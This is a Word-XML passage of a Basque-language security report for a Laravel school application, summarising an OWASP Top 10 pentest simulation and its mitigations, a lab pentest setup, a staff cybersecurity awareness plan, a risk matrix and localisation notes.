      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>9. P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>entesting simulazioa eta ahultasunen azterketa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pict>
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>9.1. Metodologia eta azterketa-ingurunea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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Aplikazioaren segurtasuna ebaluatzeko, pentesting simulazio bat burutu da </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> metodologian oinarrituta, garapen eta azterketa ingurune kontrolatuan.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9.2. Simu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>latutako eraso-kasuak (OWASP Top 10)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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A01:2021 – Broken Access Control:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Erabiltzaile ikasle baten saiotik URL bidez /admin edo /docencia bideetara zuzenean sartzeko saiakerak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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A02:2021 – Cryptographic Failures:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Posta bidez bidalitako egiaztapen-kodeak eta pasahitzak testu lautik hautemateko saiakerak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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A03:2021 – Injection (SQLi &amp; XSS):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inprimakietan eta bilaketa-eremuetan SQL komandoak eta Script kaltegarriak (&lt;script&gt;) txertatzeko saiakerak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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A07:2021 – Identifi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>cation and Authentication Failures:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Indar gordinez (Brute Force) saioa hasten saiatzea atalase-mugarik gabe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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9.3. Emaitzak eta aplikatutako arintze-neurriak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Sarbide-kontrola:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gate eta middleware bidezko egiaztapenak eskaera guztiak blokeatu zituen (403 For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>bidden erantzuna emanez).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Injertzioak:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Laravel-en Query Builder / Eloquent ORM-ak (prepared statements) SQL injertzioak prebenitu zituen, eta Blade txantiloiek HTML automatikoki ihes egiten dutenez XSS erasoak baliogabetu ziren.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Brute Force:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rate-limiting middleware-ak IP eta posta bidezko blokeoa ezarri zuen 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ahalegin huts egin ondoren.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>9.4. Laborategiko pentesting praktika eta analisi forensea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 xml:space="preserve">2026ko urriaren 2ko praktikan, Kali Linux ekipotik (192.168.10.11) Ubuntu zerbitzaria </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(192.168.10.22) aztertu zen, tokiko sareko ingurune kontrolatuan. Praktika horren helburua zerbitzuen segurtasuna eta ustiapenen aztarnak dokumentatzea da. Ingurune hau bereizita dago dokumentu honetan deskribatutako Eskolak aplikazioaren hedapenetik.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Eran</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>skin B-k segurtasun auditoretzaren txostena jasotzen du; Eranskin C-k erabilitako faseak, tresnak eta komandoak; eta Eranskin D-k ebidentziak babesteko, eskuratzeko eta Wireshark bidez aztertzeko txantiloiak.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Analisi forenseko txantiloiak osatzeko, hash ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>lio errealak, trafiko kapturaren egiaztapenak eta dagozkien pantaila argazkiak gehitu behar dira. Betetzeko markak mantendu dira.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="285"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>10. Prebentzio-plana eta enpresaren kontzientziazioa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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Kontzientziazio-planaren helburua langile eta erabiltzaile guztiek ziber</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>segurtasunaren garrantzia ulertzea eta eguneroko lanean jokabide seguruak barneratzea da.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10.1. Helburu tekniko zein antolakuntzazkoak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Phishing, iruzur elektroniko eta mezu susmagarriak identifikatzeko gaitasuna garatzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Pasahitz sendoak erabiltzea eta Fa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>ktore Anitzeko Autentifikazioa (MFA) orokortzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Kredentzialak eta kontuak sekula ez partekatzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Informazio konfidentziala eta datu pertsonalak modu babestuan tratatzea (DBEO / GDPR betez).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Kanpoko gailu ezezagunak (USB) ez kargatzea edo konektatzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Lanp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>ostutik urruntzean pantaila eta ekipoa beti blokeatzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Segurtasun-intzidenteak azkar jakinarazteko ohitura hartzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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10.2. Prestakuntza-ekintzak eta ohitura seguruak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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Langile berriek erakundean sartzean oinarrizko segurtasun-prestakuntza jaso behar dute. Horrez gain, urtean behin gutxienez berritze-saioak egingo dira, gai hauen inguruan: Phishing, Pasahitz kudeatzaileak, Sare publikoen arriskuak eta Gailu korporatiboen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>erabilera segurua.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10.3. Phishing simulazioak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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Sei hilerik behin phishing simulazio kontrolatuak egingo dira, erakundeko kideen erreakzioa aztertzeko. Simulazioen helburua hezitzailea da: ahulguneak hauteman eta prestakuntza </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pertsonalizatua eskaintzea.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10.4. Pasahitzen politika eta MFA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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Gutxieneko luzera: 12 karaktere (letra larriak, xeheak, zenbakiak eta ikurrak). Pasahitz bera ez berrerabiltzea zerbitzu ezberdinetan eta MFA aktibatzea erakundeko kudeaketa-kontu guztietan.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10.5. Intzidenteen komunikazio-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>protokoloa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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Erabiltzaile batek anomaliren bat hautematen duenean (mezu susmagarria, ezohiko saio-hasiera, ordenagailuaren portaera strandoa), berehala jakinarazi beharko dio sistemaren administratzaileari.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10.6. Plangintza eta maiztasun-matrizea</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0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0233D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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Jarduera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Ma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iztasuna</w:t>
            </w:r>
          </w:p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Oinarrizko prestakuntza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Langile berria sartzean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Segurtasun-prestakuntzaren berrikuspena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Urtero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Phishing simulazioa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hilean behin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Pasahitz eta MFA politiken berrikuspena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6 - 12 hilean behin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Segurtasun-oharrak eta alerta laburrak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Beharren arabera</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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Intzidente baten simulazioa (Crisis exercise)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468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Urtero</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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10.7. Planaren jarraipena eta ebaluazioa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333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Planaren eraginkortasuna neurtzeko adierazleak: prestakuntzako parte-hartze portzentajea, phishing simulazioetan eroritakoen tasa gutxitzea eta jakinarazitako intzidente kopurua.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="285"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>11. Arriskuen analisia eta arrisku-taula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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Arriskuen ebaluazioak informazio-sistemei eta web aplikazioari eragin diezaieketen mehatxuak identifikatzen ditu. Arrisku bakoitza </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Probabilitatea (P: 1-5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> eta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Inpaktua (I: 1-5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> biderkatuz kalkulatzen da.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11.1. Arriskuen ebaluazio-matrizea</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a8"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0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0233D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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Arriskua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Prob.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In</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.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Maila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Prebentzio-neurriak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Hondar-arriskua</w:t>
            </w:r>
          </w:p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0233D"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Phishing bidez kredentzialak lapurtzea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C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16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MFA, phishing prestakuntza, email iragazkiak.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Ertaina</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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Pasahitz ahulak erabiltzea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b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12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 karaktereko gutxienekoa, MFA, kudeatzailea.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Baxua</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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Malware / Ransomware infekzioa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b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15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Antivirus/EDR, backup-ak, eguneraketak.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Ertaina</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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Datu-baseko informazioaren lapurreta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b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10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Sarbide-murrizketak, isolamendua (192.168.20.10).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Baxua</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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SQL Injection erasoa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b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10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Laravel ORM, prepared statements, balidazioak.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Baxua</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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Baimenik gabeko sarbidea (RBAC akatsa)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b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15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Rolak, Gate baimenak, saio-kontrola.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Baxua-Ertaina</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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Zerbitzariaren </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>konfigurazio okerra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b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12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Hardening-a, firewall-a, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>auditoretzak.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Baxua</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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Datuen ustekabeko ezabaketa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b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12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Backup automatikoak, berreskuratze probak.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Baxua</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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Gailu baten galera edo lapurreta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b/>
                <w:bCs/>
                <w:color w:val="70AD47"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8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Disko-zifratzea, pasahitza, urruneko garbiketa.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Baxua</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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Barneko erabiltzailearen erabilera okerra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b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10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Gutxieneko pribilegioaren printzipioa, log-ak.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Ertaina</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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Zerbitzuaren etenaldia (Downtime)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b/>
                <w:bCs/>
                <w:color w:val="70AD47"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47"/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Proxmox HA, monitorizazioa, backup-ak.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Baxua</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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Software zaharkitua / Ahuleziak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b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12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Patch politika, composer audit, automatizazioa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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Baxua</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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11.2. Arrisku-mailen interpretazioa</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0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0233D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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Puntuazioa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Maila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Jarduketa-protokoloa</w:t>
            </w:r>
          </w:p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1 - 4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70AD47"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Baxua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Kontrol arruntak mantendu eta aldizka berrikusi.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5 - 9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70AD47"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ertaina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Prebentzio-neurriak berrikusi eta hobekuntzak planifikatu.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10 - 15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ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ED7D31"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Altua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Ekintza zuzentzaileak lehenetsi eta epe laburrean aplikatu.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16 - 25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C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Oso altua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Berehalako neurriak hartu eta zuzendaritzaren jarraipena ezarri.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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11.3. Arrisku nagusien tratamendua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333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Phishing-a, baimenik gabeko sarbidea eta ransomware-a dira arrisku kritikoenak. Tratamenduak kontrol teknikoak (MFA, sare isolamendua, backup-ak) eta giza faktorea (kontzientziazioa) bateratu behar ditu. Arriskuen taula hau gutxienez urtean behin berrikusi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> behar da.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="360"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>12. Hizkuntzak eta erabilerraztasuna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pict>
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>12.1. Nazioartekotzea (i18n) eta hizkuntza-kudeaketa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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">SetLocale middleware-ak erabiltzailearen saioan gordetako hizkuntza aplikazio osoan ezartzen du. Onartutako hizkuntzak: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Euskara (eu)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Gaztelania (es)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> eta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Ingelesa (en)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>.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12.2. Tema argia / iluna eta UI erabilerraztasuna</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Tema kudeaketa:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript bidez kudeatzen da eta erabiltzailearen aukera localStorage-n gordetzen da, sistema eragilearen lehentasunaren gainetik jarriz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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</w:rPr>
        <w:t>Erabilerraztasuna (Accessibilit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
